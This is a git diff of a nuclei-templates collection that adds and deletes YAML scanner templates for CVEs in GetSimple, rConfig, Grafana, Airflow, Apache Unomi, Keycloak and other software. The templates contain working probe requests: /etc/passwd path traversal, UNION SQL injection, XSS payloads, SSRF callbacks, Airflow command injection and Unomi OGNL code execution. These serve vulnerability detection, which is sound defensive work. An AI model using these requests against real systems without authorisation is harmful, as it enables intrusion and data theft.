https://www.netsparker.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-9915 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-9915 + cwe-id: CWE-601 + epss-score: 0.00123 + epss-percentile: 0.45694 + cpe: cpe:2.3:a:get-simple.:getsimplecms:3.3.13:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: get-simple. + product: getsimplecms + tags: cve,cve2019,redirect,getsimple,cms,get-simple. + +http: + - raw: + - | + POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userid={{username}}&pwd={{password}}&submitted=Login + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1 +# digest: 4a0a004730450221008788f058ad8bc9a4545396c8291ff2999c00d4060b07149c5cfb9cb2dd2ee71f02205a522fb23c5ab963f1f7138b1716c62a485fb4af6f4868e1792761b108572d83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-9922.yaml b/nuclei-templates/CVE-2019/cve-2019-9922.yaml deleted file mode 100644 index caff895c05..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-9922.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2019-9922 - -info: - name: Joomla! Harmis Messenger 1.2.2 - Local File Inclusion - author: 0x_Akoko - severity: high - description: Joomla! Harmis Messenger 1.2.2 is vulnerable to local file inclusion which could give an attacker read access to arbitrary files. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! application. - remediation: | - Update to the latest version of Harmis Messenger (1.2.3) or apply the patch provided by the vendor to fix the LFI vulnerability. - reference: - - https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md - - https://extensions.joomla.org/extension/je-messenger/ - - https://nvd.nist.gov/vuln/detail/CVE-2019-9922 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-9922 - cwe-id: CWE-22 - epss-score: 0.01171 - epss-percentile: 0.83428 - cpe: cpe:2.3:a:harmistechnology:je_messenger:1.2.2:*:*:*:*:joomla\!:*:* - metadata: - max-request: 1 - vendor: harmistechnology - product: je_messenger - framework: joomla\! - tags: cve2019,cve,joomla,messenger,lfi,harmistechnology,joomla\! - -http: - - method: GET - path: - - "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 -# digest: 4a0a00473045022025eb2b749f69315baa135f24019ef15db3c396a62f1595cbb6af53dc14d7aae8022100cde31cfbe066dad7ce440cdc4f4ee06dc3da7c57a7185cf726aaf72c7d6149a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-10124.yaml b/nuclei-templates/CVE-2020/CVE-2020-10124.yaml new file mode 100644 index 0000000000..065a434919 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-10124.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-10124 +info: + name: SolarWindsOrion LFI + author: medbsq + severity: medium +#- https://www.cvebase.com/cve/2019/11043 + +requests: + - method: GET + path: + - "{{BaseURL}}/web.config.i18n.ashx?l=j&v=j" + - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=j&v=j" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + matchers-condition: and + matchers: + - type: word + words: + - "SolarWinds.Orion.Core.Common." + - "Connection String" + condition: or + part: body + - type: word + words: + - "text/plain" + - "SolarWindsOrionDatabaseUser" + condition: or + part: header + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-10546.yaml b/nuclei-templates/CVE-2020/CVE-2020-10546.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-10546.yaml rename to nuclei-templates/CVE-2020/CVE-2020-10546.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-10547.yaml b/nuclei-templates/CVE-2020/CVE-2020-10547.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-10547.yaml rename to nuclei-templates/CVE-2020/CVE-2020-10547.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-10548.yaml b/nuclei-templates/CVE-2020/CVE-2020-10548.yaml deleted file mode 100644 index b053bfb21f..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-10548.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2020-10548 - -info: - name: rConfig 3.9.4 - SQL Injection - author: madrobot - severity: critical - description: rConfig 3.9.4 and previous versions have unauthenticated devices.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. - reference: - - https://github.com/theguly/exploits/blob/master/CVE-2020-10548.py - - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-10548 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-10548 - cwe-id: CWE-89,CWE-522 - cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* - epss-score: 0.37886 - tags: cve,cve2020,rconfig,sqli - metadata: - max-request: 1 - -http: - - method: GET - path: - - "{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "[project-discovery]" - part: body - -# Enhanced by mp on 2022/04/07 diff --git a/nuclei-templates/CVE-2020/CVE-2020-10549.yaml b/nuclei-templates/CVE-2020/CVE-2020-10549.yaml deleted file mode 100644 index 40989ec875..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-10549.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2020-10549 - -info: - name: rConfig <=3.9.4 - SQL Injection - author: madrobot - severity: critical - description: rConfig 3.9.4 and prior has unauthenticated snippets.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. - reference: - - https://github.com/theguly/exploits/blob/master/CVE-2020-10549.py - - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-10549 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-10549 - cwe-id: CWE-89,CWE-522 - cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* - epss-score: 0.37886 - tags: cve,cve2020,rconfig,sqli - metadata: - max-request: 1 - -http: - - method: GET - path: - - "{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "[project-discovery]" - part: body - -# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/CVE-2020/CVE-2020-10770.yaml b/nuclei-templates/CVE-2020/CVE-2020-10770.yaml deleted file mode 100644 index 038e92f4d5..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-10770.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2020-10770 - -info: - name: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated) - author: dhiyaneshDk - severity: medium - description: A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack. - reference: - - https://packetstormsecurity.com/files/164499/Keycloak-12.0.1-Server-Side-Request-Forgery.html - - https://www.exploit-db.com/exploits/50405 - - https://nvd.nist.gov/vuln/detail/CVE-2020-10770 - - https://bugzilla.redhat.com/show_bug.cgi?id=1846270 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N - cvss-score: 5.3 - cve-id: CVE-2020-10770 - cwe-id: CWE-601 - tags: keycloak,ssrf,oast,cve,cve2020,blind - -requests: - - method: GET - path: - - '{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/' - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2020/CVE-2020-11110.yaml b/nuclei-templates/CVE-2020/CVE-2020-11110.yaml new file mode 100644 index 0000000000..095ae204c6 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-11110.yaml @@ -0,0 +1,64 @@ +id: CVE-2020-11110 + +info: + name: Grafana <= 6.7.1 - Cross-Site Scripting + author: emadshanab + severity: medium + description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot. + reference: + - https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html + - https://github.com/grafana/grafana/pull/23254 + - https://security.netapp.com/advisory/ntap-20200810-0002/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-11110 + - https://hackerone.com/reports/1329433 + remediation: This issue can be resolved by updating Grafana to the latest version. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-11110 + cwe-id: CWE-79 + epss-score: 0.001 + metadata: + max-request: 1 + shodan-query: title:"Grafana" + tags: cve,cve2020,xss,grafana,hackerone + +http: + - raw: + - | + POST /api/snapshots HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Accept-Language: en-US,en;q=0.5 + Referer: {{BaseURL}} + content-type: application/json + Connection: close + + {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - application/json + + - type: word + part: body + words: + - '"deleteKey":' + - '"deleteUrl":' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '"url":"([a-z:/0-9A-Z]+)"' + +# Enhanced by mp on 2022/09/02 diff --git a/nuclei-templates/CVE-2020/CVE-2020-11455.yaml b/nuclei-templates/CVE-2020/CVE-2020-11455.yaml new file mode 100644 index 0000000000..efb53e27c6 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-11455.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-11455 + +info: + name: LimeSurvey 4.1.11 - Path Traversal + author: daffainfo + severity: medium + description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php. + reference: + - https://www.exploit-db.com/exploits/48297 + - https://www.cvedetails.com/cve/CVE-2020-11455 + - https://github.com/LimeSurvey/LimeSurvey/commit/daf50ebb16574badfb7ae0b8526ddc5871378f1b + - http://packetstormsecurity.com/files/157112/LimeSurvey-4.1.11-Path-Traversal.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2020-11455 + cwe-id: CWE-22 + tags: cve,cve2020,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-1147.yaml b/nuclei-templates/CVE-2020/CVE-2020-1147.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-1147.yaml rename to nuclei-templates/CVE-2020/CVE-2020-1147.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-11930.yaml b/nuclei-templates/CVE-2020/CVE-2020-11930.yaml deleted file mode 100644 index 543e1d0764..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-11930.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2020-11930 - -info: - name: WordPress Plugin "Translate WordPress with GTranslate" (gtranslate) XSS - author: dhiyaneshDK - severity: medium - description: | - The GTranslate plugin before 2.8.52 for WordPress was vulnerable to an Unauthenticated Reflected XSS vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option. - reference: - - https://wpscan.com/vulnerability/10181 - - https://payatu.com/blog/gaurav/analysis-of-cve-2020-11930:-reflected-xss-in-gtranslate-wordpress-module - tags: cve,cve2020,wordpress,xss,plugin - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-11930 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - '{{BaseURL}}/does_not_exist"%22%3E%3Cscript%3Ealert("XSS")%3C/script%3Ealert("XSS")' - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-11978.yaml b/nuclei-templates/CVE-2020/CVE-2020-11978.yaml new file mode 100644 index 0000000000..5c7f6e6c5b --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-11978.yaml @@ -0,0 +1,57 @@ +id: CVE-2020-11978 +info: + name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution + author: pdteam + severity: high + description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. + reference: + - https://github.com/pberba/CVE-2020-11978 + - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 + - https://twitter.com/wugeej/status/1400336603604668418 + - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-11978 + cwe-id: CWE-77 + metadata: + shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs" + verified: "true" + tags: cve,cve2020,apache,airflow,rce,kev +requests: + - raw: + - | + GET /api/experimental/test HTTP/1.1 + Host: {{Hostname}} + Accept: */* + - | + GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 + Host: {{Hostname}} + Accept: */* + - | + POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/json + + {"conf": {"message": "\"; touch test #"}} + - | + GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1 + Host: {{Hostname}} + Accept: */* + extractors: + - type: regex + name: exec_date + part: body + group: 1 + internal: true + regex: + - '"execution_date":"([0-9-A-Z:+]+)"' + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_4, "operator":"BashOperator")' + - 'contains(all_headers_4, "application/json")' + condition: and diff --git a/nuclei-templates/CVE-2020/CVE-2020-12259.yaml b/nuclei-templates/CVE-2020/CVE-2020-12259.yaml deleted file mode 100644 index df681666cc..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-12259.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2020-12259 - -info: - name: rConfig 3.9.4 - Cross-Site Scripting - author: r3Y3r53 - severity: medium - description: | - rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php - reference: - - https://www.rconfig.com/downloads/rconfig-3.9.4.zip - - https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8 - - https://nvd.nist.gov/vuln/detail/CVE-2020-12259 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2020-12259 - cwe-id: CWE-79 - epss-score: 0.16256 - epss-percentile: 0.95458 - cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* - metadata: - verified: "true" - max-request: 3 - vendor: rconfig - product: rconfig - shodan-query: http.title:"rConfig" - tags: cve,cve2020,rconfig,authenticated,xss - -http: - - raw: - - | - GET /login.php HTTP/1.1 - Host: {{Hostname}} - - | - POST /lib/crud/userprocess.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - user={{username}}&pass={{password}}&sublogin=1 - - | - GET /configDevice.php?rid="> HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' - - 'contains(content_type_3, "text/html")' - condition: and - -# digest: 4a0a00473045022100f8d8a1526641a10a5597b91842d4368f9f988b60b6a63ccfbf02e9f0fb6d968d02200abbde7f50ed4a12c850c317e2cd1103872acf5cc859aa803456d89eb71de197:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2020/CVE-2020-13121.yaml b/nuclei-templates/CVE-2020/CVE-2020-13121.yaml deleted file mode 100644 index 38db107834..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-13121.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: CVE-2020-13121 -info: - name: Submitty 20.04.01 - Open redirect - author: 0x_Akoko - severity: medium - description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt. - reference: - - https://github.com/Submitty/Submitty/issues/5265 - - https://www.cvedetails.com/cve/CVE-2020-13121 - tags: cve,cve2020,redirect,submitty - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-13121 - cwe-id: CWE-601 -requests: - - method: GET - path: - - '{{BaseURL}}/authentication/login?old=http%3A%2F%2Flexample.com' - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' - part: header diff --git a/nuclei-templates/CVE-2020/CVE-2020-13158.yaml b/nuclei-templates/CVE-2020/CVE-2020-13158.yaml deleted file mode 100644 index 800f99098c..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-13158.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2020-13158 -info: - name: Artica Proxy < 4.30.000000 Community Edition - Directory Traversal - author: 0x_Akoko - severity: high - description: Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter. - reference: - - https://github.com/InfoSec4Fun/CVE-2020-13158 - - https://sourceforge.net/projects/artica-squid/files/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-13158 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-13158 - cwe-id: CWE-22 - tags: cve,cve2020,artica,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-13483.yaml b/nuclei-templates/CVE-2020/CVE-2020-13483.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-13483.yaml rename to nuclei-templates/CVE-2020/CVE-2020-13483.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-13927.yaml b/nuclei-templates/CVE-2020/CVE-2020-13927.yaml new file mode 100644 index 0000000000..e75d589b56 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-13927.yaml @@ -0,0 +1,42 @@ +id: CVE-2020-13927 + +info: + name: Airflow Experimental <1.10.11 - REST API Auth Bypass + author: pdteam + severity: critical + description: | + Airflow's Experimental API prior 1.10.11 allows all API requests without authentication. + reference: + - https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E + - http://packetstormsecurity.com/files/162908/Apache-Airflow-1.10.10-Remote-Code-Execution.html + - https://airflow.apache.org/docs/1.10.11/security.html#api-authenticatio + - https://nvd.nist.gov/vuln/detail/CVE-2020-13927 + remediation: | + From Airflow 1.10.11 forward, the default has been changed to deny all requests by default. Note - this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide linked in the references. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-13927 + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* + epss-score: 0.95492 + metadata: + max-request: 1 + verified: "true" + shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" + tags: packetstorm,cve,cve2020,apache,airflow,unauth,auth-bypass,kev + +http: + - method: GET + path: + - '{{BaseURL}}/api/experimental/latest_runs' + + matchers: + - type: word + part: body + words: + - '"dag_run_url":' + - '"dag_id":' + - '"items":' + condition: and + +# Enhanced by mp on 2022/05/16 diff --git a/nuclei-templates/CVE-2020/CVE-2020-13942.yaml b/nuclei-templates/CVE-2020/CVE-2020-13942.yaml new file mode 100644 index 0000000000..db6176c4f9 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-13942.yaml @@ -0,0 +1,82 @@ +id: CVE-2020-13942 + +info: + name: Apache Unomi <1.5.2 - Remote Code Execution + author: dwisiswant0 + severity: critical + description: | + Apache Unomi allows conditions to use OGNL and MVEL scripting which + offers the possibility to call static Java classes from the JDK + that could execute code with the permission level of the running Java process. + This vulnerability affects all versions of Apache Unomi prior to 1.5.2. + remediation: Apache Unomi users should upgrade to 1.5.2 or later. + reference: + - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/ + - https://twitter.com/chybeta/status/1328912309440311297 + - https://nvd.nist.gov/vuln/detail/CVE-2020-13942 + - http://unomi.apache.org./security/cve-2020-13942.txt + - https://lists.apache.org/thread.html/r4a8fa91836687eaca42b5420a778ca8c8fd3a3740e4cf4401acc9118@%3Cusers.unomi.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-13942 + cwe-id: CWE-74,CWE-20 + epss-score: 0.97256 + epss-percentile: 0.9981 + cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apache + product: unomi + tags: cve,cve2020,apache,rce +variables: + id: "{{to_lower(rand_text_alpha(5))}}" + +http: + - method: POST + path: + - "{{BaseURL}}/context.json" + + body: | + { + "filters": [ + { + "id": "{{id}}", + "filters": [ + { + "condition": { + "parameterValues": { + "nuclei": "script::Runtime.getRuntime().exec('id')" + }, + "type": "profilePropertyCondition" + } + } + ] + } + ], + "sessionId": "nuclei" + } + + headers: + Content-Type: "application/json" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "application/json" + - "context-profile-id" + condition: and + + - type: regex + part: body + regex: + - "(profile|session)(Id|Properties|Segments)" + - "[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}" + condition: and + + - type: status + status: + - 200 +# digest: 4b0a00483046022100fd7131dcffc74549a5629b0211ba9459cc6162d5ad6fa5710a575f309318357a022100d4f405c6375093102e323cd6ce718b37d92e6ce34c95ef41aa028bbe3fd229f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-14181.yaml b/nuclei-templates/CVE-2020/CVE-2020-14181.yaml deleted file mode 100644 index c69995c6fa..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-14181.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2020-14181 - -info: - name: Jira Server and Data Center - Information Disclosure - author: bjhulst - severity: medium - description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the /ViewUserHover.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. Affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0. - reference: - - https://jira.atlassian.com/browse/JRASERVER-71560 - - http://packetstormsecurity.com/files/161730/Atlassian-JIRA-8.11.1-User-Enumeration.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-14181 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2020-14181 - cwe-id: CWE-200 - epss-score: 0.97351 - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" - tags: cve,cve2020,atlassian,jira,packetstorm - -http: - - method: GET - path: - - '{{BaseURL}}/secure/ViewUserHover.jspa' - - matchers-condition: and - matchers: - - type: word - words: - - 'user-hover-details' - - 'content="JIRA"' - condition: and - - - type: status - status: - - 200 - -# Enhanced by md on 2023/04/04 diff --git a/nuclei-templates/CVE-2020/CVE-2020-14408.yaml b/nuclei-templates/CVE-2020/CVE-2020-14408.yaml deleted file mode 100644 index 36f102aa68..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-14408.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2020-14408 -info: - name: Agentejo Cockpit 0.10.2 - Reflected XSS - author: edoardottt - severity: medium - description: An issue was discovered in Agentejo Cockpit 0.10.2. Insufficient sanitization of the to parameter in the /auth/login route allows for injection of arbitrary JavaScript code into a web page's content, creating a Reflected XSS attack vector. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-14408 - cwe-id: CWE-79 - reference: - - https://github.com/agentejo/cockpit/issues/1310 - - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14408 - metadata: - verified: true - tags: cve,cve2022,cockpit,agentejo,xss,oss -requests: - - method: GET - path: - - "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "redirectTo = '/92874';alert(document.domain)//280';" - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-14750.yaml b/nuclei-templates/CVE-2020/CVE-2020-14750.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-14750.yaml rename to nuclei-templates/CVE-2020/CVE-2020-14750.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-14815.yaml b/nuclei-templates/CVE-2020/CVE-2020-14815.yaml new file mode 100644 index 0000000000..e8b590b0f3 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-14815.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-14815 + +info: + name: Oracle Business Intelligence XSS + author: pikpikcu + severity: medium + reference: https://www.oracle.com/security-alerts/cpuoct2020.html + tags: cve,cve2020,oracle,xss + + # https://twitter.com/HackerOn2Wheels/status/1326927875279380480 + +requests: + - method: GET + path: + - "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect=%22%3E%3Cimg/src/onerror%3dalert(document.domain)%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "X-Oracle-Dms-Ecid:" + - "X-Oracle-Dms-Rid:" + part: header diff --git a/nuclei-templates/CVE-2020/CVE-2020-14864.yaml b/nuclei-templates/CVE-2020/CVE-2020-14864.yaml deleted file mode 100644 index 1a74ce325d..0000000000 --- 